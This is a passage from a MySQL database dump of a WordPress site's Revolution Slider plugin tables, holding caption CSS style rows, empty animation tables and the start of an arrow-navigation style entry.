#db1c22\",\"background-transparency\":\"1\",\"border-color\":\"#db1c22\",\"border-transparency\":\"0\",\"border-style\":\"solid\",\"border-width\":\"2px\",\"border-radius\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(108,'.tp-caption.Photography-Button','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"auto\",\"speed\":\"300\",\"easing\":\"Power3.easeOut\"}','{\"idle\":{\"letter-spacing\":\"1px\"},\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"600\",\"font-style\":\"normal\",\"font-family\":\"Raleway\",\"padding\":[\"13px\",\"35px\",\"13px\",\"35px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.25\",\"border-style\":\"solid\",\"border-width\":\"1px\",\"border-radius\":[\"30px\",\"30px\",\"30px\",\"30px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'),(109,'.tp-caption.Newspaper-Button-2','{\"hover\":\"true\",\"type\":\"button\",\"version\":\"5.0\",\"translated\":\"5\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"text-decoration\":\"none\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"1\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"opacity\":\"1\",\"scalex\":\"1\",\"scaley\":\"1\",\"skewx\":\"0\",\"skewy\":\"0\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"pointer_events\":\"auto\",\"css_cursor\":\"pointer\",\"speed\":\"300\",\"easing\":\"Linear.easeNone\"}','{\"idle\":\"\",\"hover\":\"\"}','{\"color\":\"#ffffff\",\"color-transparency\":\"1\",\"font-size\":\"15px\",\"line-height\":\"15px\",\"font-weight\":\"900\",\"font-style\":\"normal\",\"font-family\":\"Roboto\",\"padding\":[\"10px\",\"30px\",\"10px\",\"30px\"],\"text-decoration\":\"none\",\"text-align\":\"left\",\"background-color\":\"#000000\",\"background-transparency\":\"0\",\"border-color\":\"#ffffff\",\"border-transparency\":\"0.5\",\"border-style\":\"solid\",\"border-width\":\"2\",\"border-radius\":[\"3px\",\"3px\",\"3px\",\"3px\"],\"z\":\"0\",\"skewx\":\"0\",\"skewy\":\"0\",\"scalex\":\"1\",\"scaley\":\"1\",\"opacity\":\"1\",\"xrotate\":\"0\",\"yrotate\":\"0\",\"2d_rotation\":\"0\",\"2d_origin_x\":\"50\",\"2d_origin_y\":\"50\",\"pers\":\"600\",\"corner_left\":\"nothing\",\"corner_right\":\"nothing\",\"parallax\":\"-\"}'); /*!40000 ALTER TABLE `wpvt_revslider_css` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_css_bkp` -- DROP TABLE IF EXISTS `wpvt_revslider_css_bkp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_css_bkp` ( `id` int(9) NOT NULL AUTO_INCREMENT, `handle` text NOT NULL, `settings` longtext DEFAULT NULL, `hover` longtext DEFAULT NULL, `advanced` longtext DEFAULT NULL, `params` longtext NOT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=48 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_css_bkp` -- LOCK TABLES `wpvt_revslider_css_bkp` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_css_bkp` DISABLE KEYS */; INSERT INTO `wpvt_revslider_css_bkp` (`id`, `handle`, `settings`, `hover`, `advanced`, `params`) VALUES (1,'.tp-caption.medium_grey',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"padding\":\"2px 4px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#888\",\"white-space\":\"nowrap\"}'),(2,'.tp-caption.small_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"14px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(3,'.tp-caption.medium_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(4,'.tp-caption.large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(5,'.tp-caption.very_large_text',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"0px 2px 5px rgba(0, 0, 0, 0.5)\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"letter-spacing\":\"-2px\"}'),(6,'.tp-caption.very_big_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#000\"}'),(7,'.tp-caption.very_big_black',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"700\",\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\",\"padding\":\"0px 4px\",\"padding-top\":\"1px\",\"background-color\":\"#fff\"}'),(8,'.tp-caption.modern_medium_fat',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(9,'.tp-caption.modern_medium_fat_white',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(10,'.tp-caption.modern_medium_light',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"24px\",\"line-height\":\"20px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(11,'.tp-caption.modern_big_bluebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"800\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#4e5b6c\",\"letter-spacing\":\"0\"}'),(12,'.tp-caption.modern_big_redbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-family\":\"\\\"Open Sans\\\", sans-serif\",\"padding\":\"3px 10px\",\"padding-top\":\"1px\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"background-color\":\"#de543e\",\"letter-spacing\":\"0\"}'),(13,'.tp-caption.modern_small_text_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#555\",\"text-shadow\":\"none\",\"font-size\":\"14px\",\"line-height\":\"22px\",\"font-family\":\"Arial\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-style\":\"none\",\"white-space\":\"nowrap\"}'),(14,'.tp-caption.boxshadow',NULL,NULL,NULL,'{\"-moz-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"-webkit-box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\",\"box-shadow\":\"0px 0px 20px rgba(0, 0, 0, 0.5)\"}'),(15,'.tp-caption.black',NULL,NULL,NULL,'{\"color\":\"#000\",\"text-shadow\":\"none\"}'),(16,'.tp-caption.noshadow',NULL,NULL,NULL,'{\"text-shadow\":\"none\"}'),(17,'.tp-caption.thinheadline_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(18,'.tp-caption.thintext_dark',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"rgba(0,0,0,0.85)\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"16px\",\"line-height\":\"26px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"transparent\"}'),(19,'.tp-caption.largeblackbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#000\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(20,'.tp-caption.largepinkbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#db4360\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(21,'.tp-caption.largewhitebg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#000\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#fff\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(22,'.tp-caption.largegreenbg',NULL,NULL,NULL,'{\"position\":\"absolute\",\"color\":\"#fff\",\"text-shadow\":\"none\",\"font-weight\":\"300\",\"font-size\":\"50px\",\"line-height\":\"70px\",\"font-family\":\"\\\"Open Sans\\\"\",\"background-color\":\"#67ae73\",\"padding\":\"0px 20px\",\"-webkit-border-radius\":\"0px\",\"-moz-border-radius\":\"0px\",\"border-radius\":\"0px\"}'),(23,'.tp-caption.excerpt',NULL,NULL,NULL,'{\"font-size\":\"36px\",\"line-height\":\"36px\",\"font-weight\":\"700\",\"font-family\":\"Arial\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"rgba(0, 0, 0, 1)\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"letter-spacing\":\"-1.5px\",\"padding\":\"1px 4px 0px 4px\",\"width\":\"150px\",\"white-space\":\"normal !important\",\"height\":\"auto\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 255, 255)\",\"border-style\":\"none\"}'),(24,'.tp-caption.large_bold_grey',NULL,NULL,NULL,'{\"font-size\":\"60px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"padding\":\"1px 4px 0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(25,'.tp-caption.medium_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(102, 102, 102)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(26,'.tp-caption.small_thin_grey',NULL,NULL,NULL,'{\"font-size\":\"18px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(117, 117, 117)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"1px 4px 0px\",\"text-shadow\":\"none\",\"margin\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(27,'.tp-caption.lightgrey_divider',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(235, 235, 235, 1)\",\"width\":\"370px\",\"height\":\"3px\",\"background-position\":\"initial initial\",\"background-repeat\":\"initial initial\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(28,'.tp-caption.large_bold_darkblue',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(29,'.tp-caption.medium_bg_darkblue',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(52, 73, 94)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(30,'.tp-caption.medium_bold_red',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(31,'.tp-caption.medium_light_red',NULL,NULL,NULL,'{\"font-size\":\"21px\",\"line-height\":\"26px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(227, 58, 12)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(32,'.tp-caption.medium_bg_red',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(227, 58, 12)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(33,'.tp-caption.medium_bold_orange',NULL,NULL,NULL,'{\"font-size\":\"24px\",\"line-height\":\"30px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(243, 156, 18)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(34,'.tp-caption.medium_bg_orange',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(243, 156, 18)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(35,'.tp-caption.grassfloor',NULL,NULL,NULL,'{\"text-decoration\":\"none\",\"background-color\":\"rgba(160, 179, 151, 1)\",\"width\":\"4000px\",\"height\":\"150px\",\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(36,'.tp-caption.large_bold_white',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(37,'.tp-caption.medium_light_white',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(38,'.tp-caption.mediumlarge_light_white',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(39,'.tp-caption.mediumlarge_light_white_center',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"#ffffff\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px 0px 0px 0px\",\"text-align\":\"center\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(40,'.tp-caption.medium_bg_asbestos',NULL,NULL,NULL,'{\"font-size\":\"20px\",\"line-height\":\"20px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(127, 140, 141)\",\"padding\":\"10px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(41,'.tp-caption.medium_light_black',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"36px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(42,'.tp-caption.large_bold_black',NULL,NULL,NULL,'{\"font-size\":\"58px\",\"line-height\":\"60px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(43,'.tp-caption.mediumlarge_light_darkblue',NULL,NULL,NULL,'{\"font-size\":\"34px\",\"line-height\":\"40px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(52, 73, 94)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(44,'.tp-caption.small_light_white',NULL,NULL,NULL,'{\"font-size\":\"17px\",\"line-height\":\"28px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"transparent\",\"padding\":\"0px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(45,'.tp-caption.roundedimage',NULL,NULL,NULL,'{\"border-width\":\"0px\",\"border-color\":\"rgb(34, 34, 34)\",\"border-style\":\"none\"}'),(46,'.tp-caption.large_bg_black',NULL,NULL,NULL,'{\"font-size\":\"40px\",\"line-height\":\"40px\",\"font-weight\":\"800\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(255, 255, 255)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(0, 0, 0)\",\"padding\":\"10px 20px 15px\",\"border-width\":\"0px\",\"border-color\":\"rgb(255, 214, 88)\",\"border-style\":\"none\"}'),(47,'.tp-caption.mediumwhitebg',NULL,NULL,NULL,'{\"font-size\":\"30px\",\"line-height\":\"30px\",\"font-weight\":\"300\",\"font-family\":\"\\\"Open Sans\\\"\",\"color\":\"rgb(0, 0, 0)\",\"text-decoration\":\"none\",\"background-color\":\"rgb(255, 255, 255)\",\"padding\":\"5px 15px 10px\",\"text-shadow\":\"none\",\"border-width\":\"0px\",\"border-color\":\"rgb(0, 0, 0)\",\"border-style\":\"none\"}'); /*!40000 ALTER TABLE `wpvt_revslider_css_bkp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_layer_animations` -- DROP TABLE IF EXISTS `wpvt_revslider_layer_animations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_layer_animations` ( `id` int(9) NOT NULL AUTO_INCREMENT, `handle` text NOT NULL, `params` text NOT NULL, `settings` text DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_layer_animations` -- LOCK TABLES `wpvt_revslider_layer_animations` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_layer_animations` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_revslider_layer_animations` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_layer_animations_bkp` -- DROP TABLE IF EXISTS `wpvt_revslider_layer_animations_bkp`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_layer_animations_bkp` ( `id` int(9) NOT NULL AUTO_INCREMENT, `handle` text NOT NULL, `params` text NOT NULL, `settings` text DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_layer_animations_bkp` -- LOCK TABLES `wpvt_revslider_layer_animations_bkp` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_layer_animations_bkp` DISABLE KEYS */; /*!40000 ALTER TABLE `wpvt_revslider_layer_animations_bkp` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wpvt_revslider_navigations` -- DROP TABLE IF EXISTS `wpvt_revslider_navigations`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `wpvt_revslider_navigations` ( `id` int(9) NOT NULL AUTO_INCREMENT, `name` varchar(191) NOT NULL, `handle` varchar(191) NOT NULL, `type` varchar(191) NOT NULL, `css` longtext NOT NULL, `markup` longtext NOT NULL, `settings` longtext DEFAULT NULL, UNIQUE KEY `id` (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `wpvt_revslider_navigations` -- LOCK TABLES `wpvt_revslider_navigations` WRITE; /*!40000 ALTER TABLE `wpvt_revslider_navigations` DISABLE KEYS */; INSERT INTO `wpvt_revslider_navigations` (`id`, `name`, `handle`, `type`, `css`, `markup`, `settings`) VALUES (1,'qodef-image-nav','qodef-image-nav','arrows','.qodef-image-nav{\n height: 70px;\n width: 105px;\n background:#fff;\n}\n.qodef-image-nav .tp-arr-allwrapper{\n position: relative;\n width: 100%;\n height: 100%;\n}\n.qodef-image-nav .tp-arr-allwrapper .tp-arr-iwrapper{\n position: relative;\n width: 100%;\n height: 100%;\n background: #fff;\n -webkit-transition:all .25s ease-out;\n transition: all .25s ease-out;\n}\n\n.qodef-image-nav:hover .tp-arr-allwrapper .tp-arr-iwrapper {\n width: 110px;\n}\n\n.qodef-image-nav.tp-rightarrow.rs-touchhover .tp-arr-allwrapper .tp-arr-iwrapper {\n transform: translateX(-5px);\n}\n\n.qodef-image-nav.tparrows.rs-touchhover {\nbackground-color:#fff;\n}\n\n.qodef-image-nav.tparrows:before{\n display: none;\n}\n.qodef-image-nav .tp-arr-text-holder{\n background-color: #fff;\n height: 100%;\n display: table;\n width: 105px;\n}\n.qodef-image-nav .tp-arr-text-holder span{\n display: table-cell;\n vertical-align: middle;\n box-sizing: border-box;\n font-family: Quicksand,sans-serif;\n font-weight: 700;\n color: #0f0f0f;\n font-size: 14px;\n padding-bottom: 1px;\n}\n.qodef-image-nav.tp-leftarrow .tp-arr-text-holder span{\n padding-left: 11px;\n padding-right: 24px\n}\n.qodef-image-nav.tp-leftarrow .tp-arr-text-holder span:before{\n content: \\\"\\\\34\\\";\n font-size: 22px;\n font-family: \\\'ElegantIcons\\\'!important;\n position: relative;\n top: 4px;\n}\n.qodef-image-nav.tp-rightarrow .tp-arr-text-holder span:after{\n content: \\\"\\\\35\\\";\n font-size: 22px;\n font-family: \\\'ElegantIcons\\\'!important;\n position: relative;\n top: 4px;\n}\n.qodef-image-nav.tp-rightarrow .tp-arr-text-holder span{\n padding-right: 11px;\n padding-left: 24px\n}\n.qodef-image-nav.tp-rightarrow .tp-arr-text-holder{\n position: absolute;\n left: 0;\n}\n.qodef-image-nav.tp-leftarrow .tp-arr-text-holder{\n position: absolute;\n right: 0;\n}\n\n.tparrows .numeration { \nopacity:0;\n}\n\n.qodef-rev-slider-loaded .tparrows .numeration {\n opacity:1;\n}','
\n
\n
\n {{param1}}/{{param2}}\n
\n
\n
